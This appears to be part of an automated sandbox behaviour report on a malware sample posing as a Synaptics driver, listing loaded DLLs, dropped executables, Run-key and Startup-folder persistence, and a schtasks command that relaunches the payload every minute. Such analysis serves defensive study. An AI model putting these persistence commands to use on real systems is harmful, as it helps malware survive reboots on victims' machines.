                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: propsys.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: propsys.dll
                              Source: C:\Users\user\Desktop\FGNEBI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                              Source: WLJOQW.lnk.2.drLNK file: ..\..\..\..\..\Windata\DELPQB.exe
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\kmu15KX.iniJump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                              Source: FGNEBI.exeStatic file information: File size 1691136 > 1048576
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00EF30B0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00EF30B0
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00E205A8 push ss; ret 2_2_00E205A9
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00E1D7AC push ds; ret 2_2_00E1D7AE
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DB7795 push ecx; ret 2_2_00DB77A8
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_042EC2C8 pushad ; ret 3_2_042EC2C9
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_06EDFEDF push es; ret 3_2_06EDFEE0
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_002705A8 push ss; ret 10_2_002705A9
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0026D7AC push ds; ret 10_2_0026D7AE
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_00207795 push ecx; ret 10_2_002077A8
                              Source: initial sampleStatic PE information: section name: UPX0
                              Source: initial sampleStatic PE information: section name: UPX1
                              Source: initial sampleStatic PE information: section name: UPX0
                              Source: initial sampleStatic PE information: section name: UPX1

                              Persistence and Installation Behavior

                              barindex
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file
                              Source: C:\Users\user\Desktop\FGNEBI.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                              Source: C:\Users\user\Desktop\FGNEBI.exeFile created: C:\ProgramData\Synaptics\RCX5CF5.tmpJump to dropped file
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeFile created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeJump to dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file
                              Source: C:\Users\user\Desktop\FGNEBI.exeFile created: C:\Users\user\Desktop\._cache_FGNEBI.exeJump to dropped file
                              Source: C:\Users\user\Desktop\FGNEBI.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                              Source: C:\Users\user\Desktop\FGNEBI.exeFile created: C:\ProgramData\Synaptics\RCX5CF5.tmpJump to dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file

                              Boot Survival

                              barindex
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WLJOQW.lnkJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WLJOQW.lnkJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WLJOQWJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WLJOQWJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DAF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00DAF78E
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DF7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00DF7F0E
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_001FF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_001FF78E
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_00247F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_00247F0E
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DB1E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00DB1E5A
                              Source: C:\Users\user\Desktop\FGNEBI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
